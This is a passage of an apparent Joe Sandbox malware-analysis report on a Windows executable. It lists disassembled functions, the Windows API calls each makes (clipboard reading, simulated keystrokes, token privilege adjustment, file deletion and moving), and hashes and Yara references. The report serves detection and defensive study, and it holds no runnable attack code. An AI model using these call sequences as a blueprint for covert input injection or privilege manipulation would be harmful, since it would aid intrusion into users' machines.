                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Free$Load
                                                                        • String ID:
                                                                        • API String ID: 2391024519-0
                                                                        • Opcode ID: a9358b45654e463d5776e8941741e703871beff1f793aa6068c9beecb3728b2d
                                                                        • Instruction ID: 061b6efbd895bc6de08e4b765e4401f2fddfae6cc291bfeae504f2125a4f3d86
                                                                        • Opcode Fuzzy Hash: a9358b45654e463d5776e8941741e703871beff1f793aa6068c9beecb3728b2d
                                                                        • Instruction Fuzzy Hash: D61194B170020ABADF14AB74DC06BAE77E99F40704F10D429B59AB61D2EB709A149B60
                                                                        Function 00EE9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: 48d682e0313c83b1ffaa40571bf1062f2f72b8e72bf7a755a642666a2d2bf9f1
                                                                        • Instruction ID: 4dcca973028b80a9e7c0d5811737dc65fa2143ee9aef6e0b929ed0cf4bb9b0d8
                                                                        • Opcode Fuzzy Hash: 48d682e0313c83b1ffaa40571bf1062f2f72b8e72bf7a755a642666a2d2bf9f1
                                                                        • Instruction Fuzzy Hash: 8F2124705086018FDB24EF68C444A1ABBE1BF89308F15996CE99E6B262D731E849CF52
                                                                        Function 00E9AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ___lock_fhandle.LIBCMT ref: 00E9AFC0
                                                                          • Part of subcall function 00E97BDA: __getptd_noexit.LIBCMT ref: 00E97BDA
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                        • String ID:
                                                                        • API String ID: 1144279405-0
                                                                        • Opcode ID: bb142277eb7d7079ad49175668309c2e8f535cfd068c373242907da23c6864b6
                                                                        • Instruction ID: 10231a6e38fbe6a721c4cd1c6fdbaee0d668e2045dc4cd96cde70ddf73a2d45e
                                                                        • Opcode Fuzzy Hash: bb142277eb7d7079ad49175668309c2e8f535cfd068c373242907da23c6864b6
                                                                        • Instruction Fuzzy Hash: 9D11C4B28156048FDF127FA4E94239A76E1AF41335F2A6240E4743F2E2DBB48D049BA1
                                                                        Function 00E739DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                        • Instruction ID: 81abca9f7a981b94b77590035f1a2acf43120decc0a9b531ee92cc59693eafbc
                                                                        • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                        • Instruction Fuzzy Hash: BA01867150014DAECF04EF64C8828EEBBB8EF10304F10D069B516B71A5EB309A49DB60
                                                                        Function 00E92AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 00E92AED
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2597487223-0
                                                                        • Opcode ID: a0db23d5955e04bea0a8204264f50387ec0bc7a4ed0f45432b1f10595aaec437
                                                                        • Instruction ID: 561e0a200824fe58a14535c546bde3e88cca22632e737a5589783c341ad0f635
                                                                        • Opcode Fuzzy Hash: a0db23d5955e04bea0a8204264f50387ec0bc7a4ed0f45432b1f10595aaec437
                                                                        • Instruction Fuzzy Hash: A4F06D72900205BADF21AF748C0679F3AE5BF40324F15A41AF914BA1A1D7B88A56DB52
                                                                        Function 00E74252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00E739FE,?,00000001), ref: 00E74286
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 36608e590b832315ce73d51eaa10eb3d3edfce8ee429a0889082da0474164495
                                                                        • Instruction ID: 95173eee6d76da879ce72bcbe42cf60e92a44e24a0aa6b6c9120c2e1621ee2c0
                                                                        • Opcode Fuzzy Hash: 36608e590b832315ce73d51eaa10eb3d3edfce8ee429a0889082da0474164495
                                                                        • Instruction Fuzzy Hash: 1FF0A0B0409341CFCB348F60D880812BBF4BF04319320DA3EF1DAA2561C7319960CF40
                                                                        Function 00E740A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E740C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LongNamePath
                                                                        • String ID:
                                                                        • API String ID: 82841172-0
                                                                        • Opcode ID: 5dff4576946511719518b88be64bc81728ca022854be1402d4ff11c26427f6da
                                                                        • Instruction ID: e0eae5767cd1a91a9f4022f534a478e4b12bc28c9d478e89dee048e5458fa9fe
                                                                        • Opcode Fuzzy Hash: 5dff4576946511719518b88be64bc81728ca022854be1402d4ff11c26427f6da
                                                                        • Instruction Fuzzy Hash: F7E0C236A002246BCB21A758CC46FFA77EDDFC86A4F0940B5F90DF7248DA64E9819690
                                                                        Function 017CE6A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 017CE6B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673809921.00000000017CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_17cc000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction ID: 3217f0ff30ec568ed278290c5d03a1e4bb2ce335a72d37b40edca08824676692
                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction Fuzzy Hash: 96E0E67494010EDFDB00EFB8D54969E7FB4EF04701F100165FD01E2281DA309D50CA62

                                                                        Non-executed Functions

                                                                        Function 00EDF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00EDF87D
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EDF8DC
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EDF919
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EDF940
                                                                        • SendMessageW.USER32 ref: 00EDF966
                                                                        • _wcsncpy.LIBCMT ref: 00EDF9D2
                                                                        • GetKeyState.USER32(00000011), ref: 00EDF9F3
                                                                        • GetKeyState.USER32(00000009), ref: 00EDFA00
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EDFA16
                                                                        • GetKeyState.USER32(00000010), ref: 00EDFA20
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EDFA4F
                                                                        • SendMessageW.USER32 ref: 00EDFA72
                                                                        • SendMessageW.USER32(?,00001030,?,00EDE059), ref: 00EDFB6F
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00EDFB85
                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EDFB96
                                                                        • SetCapture.USER32(?), ref: 00EDFB9F
                                                                        • ClientToScreen.USER32(?,?), ref: 00EDFC03
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EDFC0F
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00EDFC29
                                                                        • ReleaseCapture.USER32 ref: 00EDFC34
                                                                        • GetCursorPos.USER32(?), ref: 00EDFC69
                                                                        • ScreenToClient.USER32(?,?), ref: 00EDFC76
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EDFCD8
                                                                        • SendMessageW.USER32 ref: 00EDFD02
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EDFD41
                                                                        • SendMessageW.USER32 ref: 00EDFD6C
                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EDFD84
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EDFD8F
                                                                        • GetCursorPos.USER32(?), ref: 00EDFDB0
                                                                        • ScreenToClient.USER32(?,?), ref: 00EDFDBD
                                                                        • GetParent.USER32(?), ref: 00EDFDD9
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EDFE3F
                                                                        • SendMessageW.USER32 ref: 00EDFE6F
                                                                        • ClientToScreen.USER32(?,?), ref: 00EDFEC5
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EDFEF1
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EDFF19
                                                                        • SendMessageW.USER32 ref: 00EDFF3C
                                                                        • ClientToScreen.USER32(?,?), ref: 00EDFF86
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EDFFB6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EE004B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 2516578528-4164748364
                                                                        • Opcode ID: cb7bd16f401ecbba67fc6f3a3930f66ee2499e4b13012a0692be7d3207fa485e
                                                                        • Instruction ID: 96c344ceeb0b24c790395ea563f23d59e0939af0749cec3d854e3f2a2db85932
                                                                        • Opcode Fuzzy Hash: cb7bd16f401ecbba67fc6f3a3930f66ee2499e4b13012a0692be7d3207fa485e
                                                                        • Instruction Fuzzy Hash: 4832DC74A04244EFDB14CF64C880BAABBE5FF49358F04162AF55AA73A0C730DD46EB52
                                                                        Function 00EDAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00EDB1CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: %d/%02d/%02d
                                                                        • API String ID: 3850602802-328681919
                                                                        • Opcode ID: 5f6de3c2455d9c46d13cbd21103e2e2c8bb3f4107fa3c82b433683cf7f3db2fd
                                                                        • Instruction ID: 8bf298800c4bb6b32184d16f35f620ce83472696ab072f58a8efffd28f20a429
                                                                        • Opcode Fuzzy Hash: 5f6de3c2455d9c46d13cbd21103e2e2c8bb3f4107fa3c82b433683cf7f3db2fd
                                                                        • Instruction Fuzzy Hash: DE12B071500208AFEB249F65CC49FAA7BB5FF85324F14512AF919FA2D1DBB08942CB11
                                                                        Function 00E8EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00E8EB4A
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EE3AEA
                                                                        • IsIconic.USER32(000000FF), ref: 00EE3AF3
                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00EE3B00
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EE3B0A
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EE3B20
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EE3B27
                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00EE3B33
                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00EE3B44
                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00EE3B4C
                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EE3B54
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EE3B57
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE3B6C
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EE3B77
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE3B81
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EE3B86
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE3B8F
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EE3B94
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE3B9E
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EE3BA3
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EE3BA6
                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00EE3BCD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 4125248594-2988720461
                                                                        • Opcode ID: 3494c2536118bfcbb0e3fe4dd4f8211d42f195f04dd0a75a09ba07c35cfdf202
                                                                        • Instruction ID: 5eba9f8c9f1a4d905a793cb3d7e7efcc28bbaf4fc5a4cd84095525331eeb6a26
                                                                        • Opcode Fuzzy Hash: 3494c2536118bfcbb0e3fe4dd4f8211d42f195f04dd0a75a09ba07c35cfdf202
                                                                        • Instruction Fuzzy Hash: 98316F71A4421CBEEB216BB68C49F7E7E6DEB84B54F114016FA05FA1D0D6B05D04EAA0
                                                                        Function 00EAACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EAB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EAB180
                                                                          • Part of subcall function 00EAB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EAB1AD
                                                                          • Part of subcall function 00EAB134: GetLastError.KERNEL32 ref: 00EAB1BA
                                                                        • _memset.LIBCMT ref: 00EAAD08
                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EAAD5A
                                                                        • CloseHandle.KERNEL32(?), ref: 00EAAD6B
                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EAAD82
                                                                        • GetProcessWindowStation.USER32 ref: 00EAAD9B
                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00EAADA5
                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EAADBF
                                                                          • Part of subcall function 00EAAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EAACC0), ref: 00EAAB99
                                                                          • Part of subcall function 00EAAB84: CloseHandle.KERNEL32(?,?,00EAACC0), ref: 00EAABAB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                        • String ID: $default$winsta0
                                                                        • API String ID: 2063423040-1027155976
                                                                        • Opcode ID: c9f1ecb850f7d2968f5da540814fe48a57f4aa208fd091b121acc7f959bd5ba0
                                                                        • Instruction ID: d3378e7820b522ecfcf2c0667e1bf50ac9848b14e0c16aa5ae568d95fe410a84
                                                                        • Opcode Fuzzy Hash: c9f1ecb850f7d2968f5da540814fe48a57f4aa208fd091b121acc7f959bd5ba0
                                                                        • Instruction Fuzzy Hash: A581A071900309AFDF119FA4CD45AEEBBB9FF09308F089129F814BA161D731AE54DB22
                                                                        Function 00EB60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EB6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EB5FA6,?), ref: 00EB6ED8
                                                                          • Part of subcall function 00EB6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EB5FA6,?), ref: 00EB6EF1
                                                                          • Part of subcall function 00EB725E: __wsplitpath.LIBCMT ref: 00EB727B
                                                                          • Part of subcall function 00EB725E: __wsplitpath.LIBCMT ref: 00EB728E
                                                                          • Part of subcall function 00EB72CB: GetFileAttributesW.KERNEL32(?,00EB6019), ref: 00EB72CC
                                                                        • _wcscat.LIBCMT ref: 00EB6149
                                                                        • _wcscat.LIBCMT ref: 00EB6167
                                                                        • __wsplitpath.LIBCMT ref: 00EB618E
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EB61A4
                                                                        • _wcscpy.LIBCMT ref: 00EB6209
                                                                        • _wcscat.LIBCMT ref: 00EB621C
                                                                        • _wcscat.LIBCMT ref: 00EB622F
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00EB625D
                                                                        • DeleteFileW.KERNEL32(?), ref: 00EB626E
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00EB6289
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00EB6298
                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00EB62AD
                                                                        • DeleteFileW.KERNEL32(?), ref: 00EB62BE
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EB62E1
                                                                        • FindClose.KERNEL32(00000000), ref: 00EB62FD
                                                                        • FindClose.KERNEL32(00000000), ref: 00EB630B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 1917200108-1173974218
                                                                        • Opcode ID: 45b6070cc8a0700934bdb3e67dc7a9f51a955e997cb20ff69387e4e4ac41c8b1
                                                                        • Instruction ID: 302194539d31eb69a25e3b83aa21daf9671556ef22554badeb51c1890dfe0859
                                                                        • Opcode Fuzzy Hash: 45b6070cc8a0700934bdb3e67dc7a9f51a955e997cb20ff69387e4e4ac41c8b1
                                                                        • Instruction Fuzzy Hash: CB514E7280911C6ADF21EBA1CC44EEBB7FCAF45304F0910E6E585F2111DA369789CFA4
                                                                        Function 00EC6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenClipboard.USER32(00F0DC00), ref: 00EC6B36
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EC6B44
                                                                        • GetClipboardData.USER32(0000000D), ref: 00EC6B4C
                                                                        • CloseClipboard.USER32 ref: 00EC6B58
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EC6B74
                                                                        • CloseClipboard.USER32 ref: 00EC6B7E
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EC6B93
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00EC6BA0
                                                                        • GetClipboardData.USER32(00000001), ref: 00EC6BA8
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EC6BB5
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EC6BE9
                                                                        • CloseClipboard.USER32 ref: 00EC6CF6
                                                                        Memory Dump Source
